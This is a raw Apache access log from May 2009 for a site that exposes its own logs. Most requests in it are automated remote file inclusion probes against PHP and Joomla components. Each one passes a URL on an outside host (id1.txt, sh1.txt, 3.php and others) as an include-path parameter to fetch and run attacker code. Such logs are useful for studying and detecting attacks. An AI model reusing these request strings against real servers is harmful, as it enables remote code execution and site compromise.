85.17.162.28 - - [28/May/2009:11:00:08 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:11:00:08 -0500] "GET /logs/access_log.1239753600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:11:00:08 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
203.188.254.4 - - [28/May/2009:11:00:37 -0500] "GET /logs/access_log.1237161600//?_SERVER%5BDOCUMENT_ROOT%5D=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
203.188.254.4 - - [28/May/2009:11:00:39 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.188.254.4 - - [28/May/2009:11:00:42 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
203.188.254.4 - - [28/May/2009:11:00:53 -0500] "GET /logs/access_log.1230768000//?_SERVER%5BDOCUMENT_ROOT%5D=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.45.145.66 - - [28/May/2009:11:01:29 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 200 191100 "-""libwww-perl/5.79"
110.45.145.66 - - [28/May/2009:11:01:30 -0500] "GET //?path%5Bdocroot%5D=http://www.lidoestensi.com/dmdocuments/root/glup.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
203.188.254.4 - - [28/May/2009:11:03:36 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
203.188.254.4 - - [28/May/2009:11:03:36 -0500] "GET /logs/access_log.1237161600//?_SERVER%5BDOCUMENT_ROOT%5D=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
203.188.254.4 - - [28/May/2009:11:03:38 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
65.55.106.160 - - [28/May/2009:11:03:39 -0500] "GET /logs/access_log.1123891200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.188.254.4 - - [28/May/2009:11:03:42 -0500] "GET /logs/access_log.1230768000//?_SERVER%5BDOCUMENT_ROOT%5D=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.191.227.138 - - [28/May/2009:11:04:49 -0500] "GET /includes/login.php?_SESSION%5Bdocroot_path%5D=http://208.98.22.241/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.820"
207.191.227.138 - - [28/May/2009:11:04:50 -0500] "GET /logs/includes/login.php?_SESSION%5Bdocroot_path%5D=http://208.98.22.241/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.820"
216.119.103.12 - - [28/May/2009:11:06:23 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.rakkasanwarriors.com/id5.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
216.119.103.12 - - [28/May/2009:11:06:23 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.rakkasanwarriors.com/id5.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
200.32.100.130 - - [28/May/2009:11:06:53 -0500] "GET /logs/access_log.1238371200/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:06:56 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:06:56 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:06:59 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:06:59 -0500] "GET /logs/access_log.1236988800/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:07:01 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:07:01 -0500] "GET /logs/access_log.1238371200/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:07:01 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:07:02 -0500] "GET /logs/access_log.1236988800/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:07:02 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:07:02 -0500] "GET /logs/access_log.1238371200/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:07:09 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:07:09 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
200.32.100.130 - - [28/May/2009:11:07:12 -0500] "GET /logs/access_log.1238371200/NuclearBB/tasks/send_queued_emails.php?root_path=http://strampelpeter.de//administrator/components/com_virtuemart/copyright.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:11:07:18 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:11:07:18 -0500] "GET /logs/access_log.1242432000//?_SERVER%5BDOCUMENT_ROOT%5D=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:11:07:26 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:11:07:26 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:11:07:26 -0500] "GET /logs/access_log.1238371200/NuclearBB/tasks/send_queued_emails.php?root_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:11:07:27 -0500] "GET /logs/access_log.1236988800/NuclearBB/tasks/send_queued_emails.php?root_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:11:07:29 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:11:07:29 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
72.18.148.82 - - [28/May/2009:11:07:29 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.213.245.215 - - [28/May/2009:11:07:29 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:08:32 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:08:32 -0500] "GET //admin/include/lib.module.php?mod_root=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:08:32 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.230.85.142 - - [28/May/2009:11:09:13 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
87.230.85.142 - - [28/May/2009:11:09:13 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.230.85.142 - - [28/May/2009:11:09:13 -0500] "GET /logs/access_log.1231372800//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:11:09:27 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:11:09:27 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:11:09:27 -0500] "GET //include/admin.lib.inc.php?site_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:11:09:33 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:11:09:33 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:11:09:33 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:11:09:40 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.106.67.146 - - [28/May/2009:11:09:56 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
87.106.67.146 - - [28/May/2009:11:09:56 -0500] "GET /logs/access_log.1231372800//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.106.67.146 - - [28/May/2009:11:09:56 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 314 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:11:10:13 -0500] "GET /logs//includes/header.php?c_temp_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:11:10:13 -0500] "GET /logs/access_log.1241654400//includes/header.php?c_temp_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:11:10:13 -0500] "GET //includes/header.php?c_temp_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:11:10:13 -0500] "GET /logs/access_log.1235952000//includes/header.php?c_temp_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:11:11:31 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xsports.si//1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:11:11:31 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.xsports.si//1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
209.216.213.145 - - [28/May/2009:11:11:32 -0500] "GET /logs/access_log.1233705600//modules/vwar/admin/admin.php?vwar_root=http://www.xsports.si//1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:13:01 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:13:01 -0500] "GET /logs/access_log.1242518400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:13:01 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:13:18 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:13:18 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:13:18 -0500] "GET /logs/access_log.1242518400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:13:18 -0500] "GET /logs/access_log.1242086400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:11:13:22 -0500] "GET /logs/access_log.1242086400/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
86.109.108.66 - - [28/May/2009:11:14:30 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cbspropertyltd.co.uk/modules/msgday/01bot/retorno.php???? HTTP/1.1" 404 338 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
86.109.108.66 - - [28/May/2009:11:14:30 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cbspropertyltd.co.uk/modules/msgday/01bot/retorno.php???? HTTP/1.1" 404 365 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
86.109.108.66 - - [28/May/2009:11:14:30 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cbspropertyltd.co.uk/modules/msgday/01bot/retorno.php???? HTTP/1.1" 404 343 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
86.109.108.66 - - [28/May/2009:11:14:38 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://cbspropertyltd.co.uk/modules/msgday/01bot/retorno.php???? HTTP/1.1" 404 365 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
74.208.111.178 - - [28/May/2009:11:15:02 -0500] "GET /logs/?sourcedir=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:11:15:02 -0500] "GET /?sourcedir=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:11:15:03 -0500] "GET /logs/?sourcedir=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:11:15:03 -0500] "GET /?sourcedir=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
207.182.143.50 - - [28/May/2009:11:16:27 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.208.111.178 - - [28/May/2009:11:16:50 -0500] "GET /logs/?sourcedir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:11:16:50 -0500] "GET /?sourcedir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
113.29.225.7 - - [28/May/2009:11:17:47 -0500] "GET /logs//includes/header.php?c_temp_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:11:17:47 -0500] "GET //includes/header.php?c_temp_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
113.29.225.7 - - [28/May/2009:11:17:47 -0500] "GET /logs/access_log.1241654400//includes/header.php?c_temp_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
58.63.104.51 - - [28/May/2009:11:18:29 -0500] "GET /logs/access_log.1238716800 HTTP/1.1" 200 181179 "http://cnweb.search.live.com/results.aspx?q=http%3A%2F%2F218.206.94.81&filt=all&first=61&FORM=PORE""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.63.104.51 - - [28/May/2009:11:18:30 -0500] "GET /favicon.ico HTTP/1.1" 404 294 "-""-"
113.29.225.7 - - [28/May/2009:11:19:08 -0500] "GET /logs/access_log.1235952000//includes/header.php?c_temp_path=http://www.geocities.com/andrie_it/id2.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
87.106.67.146 - - [28/May/2009:11:19:09 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.106.67.146 - - [28/May/2009:11:19:19 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.230.85.142 - - [28/May/2009:11:20:53 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.230.85.142 - - [28/May/2009:11:21:04 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.50.197.106 - - [28/May/2009:11:22:34 -0500] "GET /logs/?sourcedir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
69.50.197.106 - - [28/May/2009:11:22:35 -0500] "GET /?sourcedir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
69.50.197.106 - - [28/May/2009:11:22:36 -0500] "GET /logs/?sourcedir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
69.50.197.106 - - [28/May/2009:11:22:36 -0500] "GET /?sourcedir=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
213.198.53.173 - - [28/May/2009:11:23:57 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 314 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
213.198.53.173 - - [28/May/2009:11:23:57 -0500] "GET //include/admin.lib.inc.php?site_path=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 404 309 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
200.137.131.138 - - [28/May/2009:11:24:02 -0500] "GET //include/admin.lib.inc.php?site_path=http://stptcellular.net/webalizer/test.txt??? HTTP/1.1" 404 309 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
200.137.131.138 - - [28/May/2009:11:24:02 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://stptcellular.net/webalizer/test.txt??? HTTP/1.1" 404 314 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
65.55.208.140 - - [28/May/2009:11:24:09 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [28/May/2009:11:24:10 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.17.162.28 - - [28/May/2009:11:28:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://gmissn.3dn.ru/osiris.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
85.17.162.28 - - [28/May/2009:11:28:28 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://gmissn.3dn.ru/osiris.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:11:29:32 -0500] "GET /logs///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:11:29:33 -0500] "GET ///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:11:29:57 -0500] "GET /logs///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:11:29:57 -0500] "GET ///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:11:31:11 -0500] "GET /logs/index.php?option=com_dbquery&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
213.206.93.3 - - [28/May/2009:11:31:11 -0500] "GET /index.php?option=com_dbquery&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
85.214.53.125 - - [28/May/2009:11:31:48 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
85.214.53.125 - - [28/May/2009:11:31:48 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
195.34.78.110 - - [28/May/2009:11:32:38 -0500] "GET ///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:11:32:38 -0500] "GET /logs/access_log.1242086400///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:11:32:38 -0500] "GET /logs///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:11:32:40 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:11:32:40 -0500] "GET /logs/access_log.1241654400///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:11:32:40 -0500] "GET ///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.34.78.110 - - [28/May/2009:11:32:40 -0500] "GET /logs///administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.122.72.93 - - [28/May/2009:11:36:15 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.122.72.93 - - [28/May/2009:11:36:15 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.122.72.93 - - [28/May/2009:11:36:15 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.122.72.93 - - [28/May/2009:11:36:40 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
202.75.4.169 - - [28/May/2009:11:37:49 -0500] "GET /logs/index.php?option=com_dbquery&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [28/May/2009:11:37:50 -0500] "GET /index.php?option=com_dbquery&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
64.182.124.1 - - [28/May/2009:11:39:22 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.rakkasanwarriors.com/ainul/AinuLid2.txt??? HTTP/1.0" 404 310 "-""libwww-perl/5.53"
64.182.124.1 - - [28/May/2009:11:39:22 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.rakkasanwarriors.com/ainul/AinuLid2.txt??? HTTP/1.0" 404 305 "-""libwww-perl/5.53"
